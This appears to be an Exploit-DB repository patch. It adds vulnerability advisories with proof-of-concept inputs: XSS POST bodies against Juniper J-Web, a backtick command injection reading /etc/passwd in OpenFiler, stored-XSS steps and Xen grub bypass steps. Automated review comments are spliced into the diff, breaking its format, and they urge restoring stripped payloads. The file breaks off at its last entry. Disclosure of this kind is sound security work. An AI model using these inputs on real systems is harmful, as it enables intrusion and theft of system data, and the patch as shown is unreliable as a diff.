From cd337ecfafd22c3550d079e9510a68824853af2f Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 10 May 2014 04:36:25 +0000 Subject: [PATCH] Updated 05_10_2014 --- files.csv | 23 ++++++++ platforms/hardware/remote/33257.txt | 12 +++++ platforms/hardware/remote/33258.txt | 20 +++++++ platforms/hardware/remote/33259.txt | 53 ++++++++++++++++++ platforms/hardware/remote/33260.txt | 14 +++++ platforms/hardware/remote/33261.txt | 18 +++++++ platforms/hardware/remote/33265.js | 34 ++++++++++++ platforms/hardware/webapps/33247.txt | 40 ++++++++++++++ platforms/hardware/webapps/33248.txt | 63 ++++++++++++++++++++++ platforms/java/webapps/33254.txt | 9 ++++ platforms/linux/dos/33222.txt | 9 ++++ platforms/linux/dos/33223.txt | 9 ++++ platforms/linux/dos/33224.txt | 9 ++++ platforms/linux/local/33255.txt | 14 +++++ platforms/multiple/dos/33182.txt | 10 ++++ platforms/php/webapps/33249.txt | 81 ++++++++++++++++++++++++++++ platforms/php/webapps/33252.txt | 45 ++++++++++++++++ platforms/php/webapps/33256.txt | 9 ++++ platforms/php/webapps/33262.txt | 11 ++++ platforms/php/webapps/33266.txt | 9 ++++ platforms/php/webapps/33267.txt | 9 ++++ platforms/windows/remote/33172.txt | 10 ++++ platforms/windows/remote/33263.html | 12 +++++ platforms/windows/remote/33264.txt | 49 +++++++++++++++++ 24 files changed, 572 insertions(+) create mode 100755 platforms/hardware/remote/33257.txt create mode 100755 platforms/hardware/remote/33258.txt create mode 100755 platforms/hardware/remote/33259.txt create mode 100755 platforms/hardware/remote/33260.txt create mode 100755 platforms/hardware/remote/33261.txt create mode 100755 platforms/hardware/remote/33265.js create mode 100755 platforms/hardware/webapps/33247.txt create mode 100755 platforms/hardware/webapps/33248.txt create mode 100755 platforms/java/webapps/33254.txt create mode 100755 platforms/linux/dos/33222.txt create mode 100755 platforms/linux/dos/33223.txt create mode 100755 platforms/linux/dos/33224.txt create mode 100755 platforms/linux/local/33255.txt create mode 100755 
platforms/multiple/dos/33182.txt create mode 100755 platforms/php/webapps/33249.txt create mode 100755 platforms/php/webapps/33252.txt create mode 100755 platforms/php/webapps/33256.txt create mode 100755 platforms/php/webapps/33262.txt create mode 100755 platforms/php/webapps/33266.txt create mode 100755 platforms/php/webapps/33267.txt create mode 100755 platforms/windows/remote/33172.txt create mode 100755 platforms/windows/remote/33263.html create mode 100755 platforms/windows/remote/33264.txt
diff --git a/files.csv b/files.csv
index 151e812c9..425edb007 100755
--- a/files.csv
+++ b/files.csv
@@ -29905,6 +29905,7 @@ id,file,description,date,author,platform,type,port
 33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
 33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
 33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 'admin/edit.asp' Authentication Bypass Vulnerability",2009-08-17,spymeta,asp,webapps,0
+33172,platforms/windows/remote/33172.txt,"Valve Software Source Engine - Format String Vulnerability",2009-08-17,"Luigi Auriemma",windows,remote,0
 33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (1)",2007-02-07,trevordixon,windows,dos,0
 33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (2)",2007-02-07,trevordixon,windows,dos,0
 33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (3)",2007-02-07,trevordixon,windows,dos,0
@@ -29913,6 +29914,7 @@ id,file,description,date,author,platform,type,port
 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0
 33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x 'index.template.html' Cross Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0
 33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0
+33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service Vulnerability",2009-08-23,"Luigi Auriemma",multiple,dos,0
 33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0
 33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (2)",2009-08-25,"Francis Provencher",novell,dos,0
 33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector 'lnresobject.dll' Unspecified Remote Denial of Service Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
@@ -29950,6 +29952,9 @@ id,file,description,date,author,platform,type,port
 33219,platforms/php/webapps/33219.txt,"Planet 2.0 HTML Injection Vulnerability",2009-09-11,"Steve Kemp",php,webapps,0
 33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 'NOOP' Command Denial Of Service Vulnerability",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0
 33221,platforms/windows/dos/33221.html,"Novell GroupWise Client 7.0.3.1294 'gxmim1.dll' ActiveX Control Buffer Overflow Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
+33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion DoS",2009-09-15,"Buildbot Builder",linux,dos,0
+33223,platforms/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Unspecified Remote DoS",2009-09-15,"Buildbot Builder",linux,dos,0
+33224,platforms/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Unspecified Remote DoS",2009-09-15,"Buildbot Builder",linux,dos,0
 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 'emimap4.dll' ActiveX Control Remote Code Execution Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 'emaillinks.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
@@ -29968,3 +29973,21 @@ id,file,description,date,author,platform,type,port
 33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0
 33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter XSS",2009-09-22,OoN_Boy,php,webapps,0
 33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone SQL Injection Vulnerability",2009-09-23,OoN_Boy,php,webapps,0
+33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0
+33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0
+33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0
+33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0
+33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0
+33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0
+33256,platforms/php/webapps/33256.txt,"e107 0.7.x 'CAPTCHA' Security Bypass Vulnerability and Multiple Cross Site Scripting Vulnerabilities",2009-09-28,MustLive,php,webapps,0
+33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J-Web Interface Default URI PATH_INFO Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0
+33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface /diagnose Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0
+33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface /configuration Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0
+33260,platforms/hardware/remote/33260.txt,"Juniper Junos 
8.5/9.0 J-Web Interface /scripter.php Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0
+33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface Multiple Script m[] Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0
+33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 'p' Parameter Directory Traversal Vulnerability",2009-09-29,"Infected Web",php,webapps,0
+33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0
+33264,platforms/windows/remote/33264.txt,"Internet Explorer 8 X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0
+33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0
+33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder 'group_id' Parameter SQL Injection Vulnerability",2009-10-05,kaMtiEz,php,webapps,0
+33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription 'email' Parameter Cross Site Scripting Vulnerability",2009-10-06,"Paulo Santos",php,webapps,0
diff --git a/platforms/hardware/remote/33257.txt b/platforms/hardware/remote/33257.txt
new file mode 100755
index 000000000..eb92d3fc4
--- /dev/null
+++ b/platforms/hardware/remote/33257.txt
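Review bot: The new `33249` row describes the target as `Collabtive 1.2`, while the advisory it points to (platforms/php/webapps/33249.txt in this same patch) states `Affected version: 1.12` and `Fixed version: 2.0`, so one of the two is wrong and searches by version will miss it; the description should read `Collabtive 1.12 - SQL Injection` if the advisory is right. The `33247` and `33252` descriptions also omit that both PoCs start by logging in, which matters for triage — `OpenFiler 2.99.1 - Authenticated Arbitrary Code Execution` and `Cobbler 2.4.x - 2.6.x - Authenticated Arbitrary File Read` would be more accurate. `33252` is filed under platform `php` although its PoC only references `/cobbler_web/`; confirm the platform tag.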
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36537/info
+
+Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management).
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+This issue affects the following:
+
+J-Web 8.5R1.14
+J-Web 9.0R1.1
+
+http://www.example.com/"
\ No newline at end of file
diff --git a/platforms/hardware/remote/33258.txt b/platforms/hardware/remote/33258.txt
new file mode 100755
index 000000000..ef7e2419e
--- /dev/null
+++ b/platforms/hardware/remote/33258.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/36537/info
+
+Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management).
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+This issue affects the following:
+
+J-Web 8.5R1.14
+J-Web 9.0R1.1
+
+Program URI :- http://www.example.com/diagnose?m[]=pinghost
+
+Vulnerable Parameter :- Remote Host
+
+
+Program URI :- http://www.example.com/diagnose?m[]=traceroute
+
+Vulnerable Parameter :- Remote Host
+
\ No newline at end of file
diff --git a/platforms/hardware/remote/33259.txt b/platforms/hardware/remote/33259.txt
new file mode 100755
index 000000000..085510098
--- /dev/null
+++ b/platforms/hardware/remote/33259.txt
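Review bot: The only PoC line in 33257.txt, `http://www.example.com/"`, stops at the opening quote with no tag or script after it, so the payload appears to have been stripped during ingestion and the entry is not reproducible as stored; the `PATH_INFO` vector named in its files.csv description is not visible either. Restore the payload from the referenced BID 36537 advisory or mark the entry as incomplete. The sibling 33259.txt request carries a `Cookie: PHPSESSID=...` header, so these J-Web vectors presumably need an authenticated session; a one-line caveat to that effect belongs in each of the five J-Web files.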
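Review bot: 33258.txt identifies the vulnerable input only by its form label (`Vulnerable Parameter :- Remote Host`) for `/diagnose?m[]=pinghost` and `/diagnose?m[]=traceroute`, with neither the request parameter name nor a payload, so it is a pointer to BID 36537 rather than a PoC. Add the actual POST parameter and an example value (a `"/><script>alert(1)</script>` style string, as the decoded payloads in 33259.txt use) so the entry can be replayed.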
@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/36537/info
+
+Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management).
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+This issue affects the following:
+
+J-Web 8.5R1.14
+J-Web 9.0R1.1
+
+Program URI :- http://www.example.com/configuration?m[]=wizards&m[]=rpm
+
+POST
+current-page=main&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&probe-owner-list-hidden=false&probe-owner-delete-hidden=true&probe-limit-hidden=false&probe-limit=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&probe-server-tcp-hidden=false&probe-server-tcp=&probe-server-udp-hidden=false&probe-server-udp=&ok-button=++OK++
+
+Program URI :- http://www.example.com/configuration?m[]=wizards&m[]=firewall-acl&m[]=firewall-filters
+
+POST
+current-page=firewall-filters&wizard-next=firewall-filter-term&wizard-mode=new-item&wizard-args=&wizard-ids=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-previous=firewall-filters&filteraclsummary-hidden=false&wizard-tab-page=firewall-filter-term&wizard-tab-selected=source&pager-new-identifier=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pager-new-location=end&term-name-search=&num-per-page=25&num-per-page=25&num-per-page=25
+
+Pogram URI :- http://www.example.com/configuration?m[]=wizards&m[]=cos&m[]=cos-interfaces
+
+POST
+current-page=cos-physical-interfaces-edit&wizard-next=cos-logical-interfaces-edit&wizard-mode=add&wizard-args=%7Bcos-physical-interface-name%7D&wizard-ids=%7Bcos-physical-interface-name%7D&wizard-previous=cos-physical-interfaces-edit&cos-physical-interface-name-hidden=false&cos-physical-interface-name=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cos-physical-interface-scheduler-map-hidden=false&cos-physical-interface-scheduler-map=&cos-logical-interfaces-list-hidden=false&cos-logical-interfaces-delete-hidden=true&cos-physical-interface-scheduler-map=
+
+PROGRAM URI :- http://www.example.com/configuration?m[]=wizards&m[]=snmp
+
+POST
+current-page=main&wizard-next=snmp-community&wizard-mode=edit&wizard-args=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-ids=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-previous=main&contact-hidden=false&contact=&description-hidden=false&description=&engineid-hidden=false&engineid=&location-hidden=false&location=&override-hidden=false&override=&communities-hidden=false&snmp-community-delete-hidden=true&trapgroups-hidden=false&snmp-trap-group-delete-hidden=true&health-monitor-enable-original=off&health-monitor-enable-hidden=false&interval-hidden=false&rising-threshold-non-jseries-hidden=false&falling-threshold-non-jseries-hidden=false&community-checked%5B%5D=off&health-monitor-enable=off&interval=&rising-threshold-non-jseries=&falling-threshold-non-jseries=
+
+PROGRAM URI :- http://www.example.com/configuration?m[]=wizards&m[]=users
+
+POST
+current-page=users&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&username-hidden=false&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&fullname-hidden=false&fullname=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&class-hidden=false&class=unauthorized&loginpassword-hidden=false&loginpassword=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&loginpassword-verify=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ok-button=++OK++&class=unauthorized
+
+PROGRAM URI :- http://www.example.com/configuration?m[]=wizards&m[]=https
+
+POST
+current-page=local-cert&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&certname-hidden=false&certname=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&certbody-hidden=false&certbody=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ok-button=++OK++
+
+
+POST /configuration?m[]=wizards&m[]=https HTTP/1.1
+Host: www.example.com
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
+Connection: close
+Referer: http://www.example.com/configuration?m[]=wizards&m[]=https&start=true
+Cookie: PHPSESSID=faf6133c44481c24b61a04f4c0ef57be;
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 782
+https-allifls-hidden=false&https-interfaces-hidden=false&https-cert-hidden=false&local-cert-delete-hidden=true&wizard-next=b7777">095b2419adf&https-allifls=on&https-allifls-original=on&xnmssltoggle=on&http-allifls-hidden=false&http-interfaces-hidden=false&certs-hidden=false&right-http-interfaces-duallist%5b%5d=lo0.16384&http-allifls=on&http-allifls-original=off&wizard-ids=¤t-page=main&http-enable-hidden=false&text-hidden=false&wizard-args=&wizard-previous=&xnmssltoggle-hidden=false&httpstoggle-hidden=false&right-https-interfaces-duallist%5b%5d=lo0.16384&left-http-interfaces-duallist%5b%5d=em0.0&http-enable-original=on&httpstoggle-original=off&apply-button=Apply&xnmssltoggle-original=off&xnmssl-cert-hidden=false&http-enable=on&httpstoggle=on&wizard-mode=&http-interfaces-original=Array
\ No newline at end of file
diff --git a/platforms/hardware/remote/33260.txt b/platforms/hardware/remote/33260.txt
new file mode 100755
index 000000000..cf6e7295e
--- /dev/null
+++ b/platforms/hardware/remote/33260.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/36537/info
+
+Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management).
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+This issue affects the following:
+
+J-Web 8.5R1.14
+J-Web 9.0R1.1
+
+11. http://www.example.com/scripter.php?act=">&debug=1&ifid=1&refresh-time=1&
+12. http://www.example.com/scripter.php?refresh-time=">
+13. http://www.example.com/scripter?act=header&ifid=')">&
\ No newline at end of file
diff --git a/platforms/hardware/remote/33261.txt b/platforms/hardware/remote/33261.txt
new file mode 100755
index 000000000..762843384
--- /dev/null
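Review bot: The raw request at the end of 33259.txt is corrupted and cannot be replayed as stored: `wizard-ids=¤t-page=main` is `&current-page=main` with `&curren` decoded as the `¤` HTML entity, and `wizard-next=b7777">095b2419adf` has lost whatever tag followed `">`. The six wizard POST bodies above it are intact, but every vector is post-authentication (note the `Cookie: PHPSESSID=...` header), so practical exploitation means getting a logged-in J-Web admin to submit the form; none of the captured bodies shows an anti-CSRF token, which is consistent with that but not confirmed here. If the body is repaired, `Content-Length: 782` must be recomputed.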
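Review bot: All three PoC URLs in 33260.txt end at the attribute break-out (`act=">`, `refresh-time=">`, `ifid=')">`) with nothing after the closing bracket, so the injected markup was stripped and only the prefix survives; the entry is not reproducible as stored. URL 13 also targets `/scripter` without the `.php` suffix used by URLs 11 and 12 — confirm against the BID 36537 source whether both routes exist or this is a transcription error.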
+++ b/platforms/hardware/remote/33261.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/36537/info
+
+Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management).
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+This issue affects the following:
+
+J-Web 8.5R1.14
+J-Web 9.0R1.1
+
+http://www.example.com/monitor?m[]='>
+http://www.example.com/manage?m[]='>
+http://www.example.com/events?m[]='>
+http://www.example.com/configuration?m[]='>
+http://www.example.com/alarms?m[]='>
+http://www.example.com/?m[]='>
+http://www.example.com/?action=browse&m[]=">&path=/var/crash&
\ No newline at end of file
diff --git a/platforms/hardware/remote/33265.js b/platforms/hardware/remote/33265.js
new file mode 100755
index 000000000..88849b04d
--- /dev/null
+++ b/platforms/hardware/remote/33265.js
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/36592/info
+
+Palm WebOS is prone to an arbitrary-script-injection vulnerability because the integrated email application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code. Successful exploits can compromise the application.
+
+Versions prior to WebOS 1.2 are vulnerable.
+
+
+
diff --git a/platforms/hardware/webapps/33247.txt b/platforms/hardware/webapps/33247.txt
new file mode 100755
index 000000000..36eb4dbe6
--- /dev/null
+++ b/platforms/hardware/webapps/33247.txt
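Review bot: Each of the seven `m[]='>` URLs in 33261.txt ends at the quote break-out with no payload, so as with 33257/33260 the injected script was lost in transcription and the file is not self-contained. The last URL, `/?action=browse&m[]=">&path=/var/crash&`, exposes a file-browser `path` parameter; the advisory claims only XSS there, so do not read it as a traversal finding without testing.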
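Review bot: platforms/hardware/remote/33265.js is declared as 34 lines by both the diffstat and the `@@ -0,0 +1,34 @@` header, but only the ten-line BID 36592 summary (four text lines, six blank) is present; the script-injection PoC that should follow is missing from the patch. As stored the file is not valid JavaScript either — it opens with bare prose (`source: http://...`) rather than a comment — so tooling that loads `.js` entries will choke on it. Either restore the PoC body or wrap the header in `/* ... */`.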
@@ -0,0 +1,40 @@
+# Exploit Title: Arbitrary Code Execution in Openfiler
+
+# Exploit author: Dolev Farhi @f1nhack
+
+# Date 07/05/2014
+
+# Vendor homepage: http://www.openfiler.com
+
+# Affected Software version: 2.99.1
+
+# Alerted vendor: 7.5.14
+
+
+Software Description
+=====================
+Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
+Storage Area Networking functionality in a single cohesive framework.
+
+
+
+Vulnerability Description
+=========================
+Arbitrary code execution
+
+
+Steps to reproduce / PoC:
+=========================
+1.1. Login to Openfiler dashboard.
+
+1.2. Under system tab -> Hostname
+
+1.3. Enter any shell command you desire using the backticks ` `
+
+ e.g. `cat /etc/passwd`
+
+1.4. the code reflects in the hostname value space
+
+
+
+ <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
\ No newline at end of file
diff --git a/platforms/hardware/webapps/33248.txt b/platforms/hardware/webapps/33248.txt
new file mode 100755
index 000000000..6a0f82cbc
--- /dev/null
+++ b/platforms/hardware/webapps/33248.txt
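Review bot: The PoC in 33247.txt is post-authentication (step 1.1 logs into the dashboard) and the vector is shell command substitution in the Hostname field via backticks (`` `cat /etc/passwd` ``), yet both the title and the files.csv description present it as unqualified Arbitrary Code Execution; add `Authenticated` to the title. The write-up never says which OS user the command runs as, nor whether the result is only reflected into the form (step 1.4) or the hostname is persisted, and those two facts decide whether this is an appliance root compromise or a web-UI-user issue — state them or mark them unknown. Note also that `Date 07/05/2014` and `Alerted vendor: 7.5.14` are the same day, one day before the 2014-05-08 index date, and the advisory records no vendor response.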
@@ -0,0 +1,63 @@
+# Exploit Title: Multiple persistent XSS in Openfiler
+
+# Exploit author: Dolev Farhi @f1nhack
+
+# Date 07/05/2014
+
+# Vendor homepage: http://www.openfiler.com
+
+# Affected Software version: 2.99.1
+
+# Alerted vendor: 7.5.14
+
+
+Software Description
+=====================
+Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
+Storage Area Networking functionality in a single cohesive framework.
+
+
+
+Vulnerability Description
+=========================
+Multiple Persistent Cross Site Scripting
+
+
+
+Steps to reproduce / PoC:
+=========================
+1.1. Login to Openfiler dashboard.
+
+1.2. Under system tab -> Network Access Configuration create a new NAC
+
+1.3. Name the NAC
+
+1.4. Navigate to another tab.
+
+1.5. Navigate back to System tab
+
+1.6. the XSS reflects to the window.
+
+
+
+2.1. Create a new Volume Group.
+
+2.2. Create a new Logical Volume with any name you want.
+
+2.3. in the Description, enter alert("XSS")
+
+2.4. Click OK.
+
+2.5. Navigate to "Shares" tab -> XSS
+
+2.6. Navigate to "Snapshot Shares" -> XSS
+
+2.7. Navigate to "Existing shares" -> XSS
+
+2.8. Navigate to "Quota" -> XSS
+
+
+
+
+
+ <-> PoC Video: https://www.youtube.com/watch?v=CLG5iS3qU-M&feature=youtu.be
\ No newline at end of file
diff --git a/platforms/java/webapps/33254.txt b/platforms/java/webapps/33254.txt
new file mode 100755
index 000000000..13694a74d
--- /dev/null
+++ b/platforms/java/webapps/33254.txt
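Review bot: Both XSS payloads in 33248.txt have been stripped: step 1.3 reads only `Name the NAC` with no value, and step 2.3 reads `enter alert("XSS")` with no surrounding script tag, so neither chain is reproducible from the text and the linked video is the only evidence. Restore the payloads, e.g. `<script>alert("XSS")</script>`, in both steps. Both chains are post-authentication (step 1.1), which the title `Multiple persistent XSS in Openfiler` should say, and step 1.6 (`the XSS reflects to the window`) should name which System-tab element renders the stored NAC name.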
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36513/info
+
+IBM Lotus Connections is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks
+
+IBM Lotus Connections 2.0.1 is affected; other versions may be vulnerable as well.
+
+https://www.example.com/profiles/html/simpleSearch.do?name=&lang=en
\ No newline at end of file
diff --git a/platforms/linux/dos/33222.txt b/platforms/linux/dos/33222.txt
new file mode 100755
index 000000000..617a30838
--- /dev/null
+++ b/platforms/linux/dos/33222.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36408/info
+
+Wireshark is prone to multiple denial-of-service vulnerabilities.
+
+Exploiting these issues may allow attackers to crash the application and deny service to legitimate users.
+
+These issues affect Wireshark 0.99.6 through 1.2.1.
+
+http://www.exploit-db.com/sploits/33222.pcap
\ No newline at end of file
diff --git a/platforms/linux/dos/33223.txt b/platforms/linux/dos/33223.txt
new file mode 100755
index 000000000..d0eb1fecc
--- /dev/null
+++ b/platforms/linux/dos/33223.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36408/info
+
+Wireshark is prone to multiple denial-of-service vulnerabilities.
+
+Exploiting these issues may allow attackers to crash the application and deny service to legitimate users.
+
+These issues affect Wireshark 0.99.6 through 1.2.1.
+
+http://www.exploit-db.com/sploits/33223.zip
\ No newline at end of file
diff --git a/platforms/linux/dos/33224.txt b/platforms/linux/dos/33224.txt
new file mode 100755
index 000000000..4f6702b16
--- /dev/null
+++ b/platforms/linux/dos/33224.txt
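Review bot: The single PoC line in 33254.txt, `simpleSearch.do?name=&lang=en`, carries an empty `name` value, so the XSS payload was stripped and what remains is a benign URL. Restore it from BID 36513 or mark the entry incomplete; the files.csv description already commits to `simpleSearch.do`, so the parameter is presumably `name`, but the payload itself is what a reader needs.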
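Review bot: 33222.txt and its siblings 33223.txt/33224.txt contain no PoC at all, only a pointer to `http://www.exploit-db.com/sploits/33222.pcap` (`.zip` for 33223), so the crashes are not reproducible from the repository and depend on an external host staying up. The text gives the affected range as `Wireshark 0.99.6 through 1.2.1`, while the new files.csv rows title each entry `Wireshark 1.2.1 - ...`; the index should carry the range. Which dissector each capture hits (OpcUa, TLS, GSM A RR per files.csv) is not stated in the text files themselves, so a reader cannot match capture to bug without fetching the pcaps.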
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36408/info
+
+Wireshark is prone to multiple denial-of-service vulnerabilities.
+
+Exploiting these issues may allow attackers to crash the application and deny service to legitimate users.
+
+These issues affect Wireshark 0.99.6 through 1.2.1.
+
+http://www.exploit-db.com/sploits/33224.pcap
\ No newline at end of file
diff --git a/platforms/linux/local/33255.txt b/platforms/linux/local/33255.txt
new file mode 100755
index 000000000..e959d7c36
--- /dev/null
+++ b/platforms/linux/local/33255.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/36523/info
+
+Xen is prone to a local authentication-bypass vulnerability.
+
+A local attacker with physical access to an affected host can exploit this issue to bypass authentication and modify the 'grub.conf' file. This may aid in a complete compromise of the affected system.
+
+Xen 3.0.3, 3.3.0, and 3.3.1 are affected; other versions may also be vulnerable.
+
+xm create -c guest
+press space bar to stop the grub count down
+press e to edit
+select the kernel line and press e
+Append a "1" to the end of the kernel line and press return
+press "b" to boot
\ No newline at end of file
diff --git a/platforms/multiple/dos/33182.txt b/platforms/multiple/dos/33182.txt
new file mode 100755
index 000000000..1e916e856
--- /dev/null
